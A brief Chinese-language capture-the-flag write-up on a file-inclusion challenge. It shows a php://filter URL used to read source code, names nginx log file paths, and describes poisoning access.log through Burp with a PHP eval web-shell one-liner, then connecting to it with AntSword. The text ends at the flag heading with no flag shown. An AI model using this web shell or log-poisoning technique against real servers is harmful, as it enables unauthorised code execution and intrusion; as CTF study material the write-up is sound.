日志包含漏洞
验证是文件包含漏洞
想读取源码,但是返回error
?url=php://filter/read=convert.base64-encode/resource=index.php
参考了一点其他大佬的WP
通过查看请求头可以知道服务器为Ubuntu,由nginx搭建的网站,
nginx的日志文件在/var/log/nginx/access.log和/var/log/nginx/error.log,其中access.log可以打开
为了防止url编码,需要使用burp
如果直接在url里面插入一句话会返回:
400 Bad Request
因此只能在burp参数里面插入一句话
<?php eval($_POST['hack']);?>
之后用蚁剑连接access.log文件就行了,之前的一句话就插入到这里面了,但是网页上是无法显示出来的
得到flag:
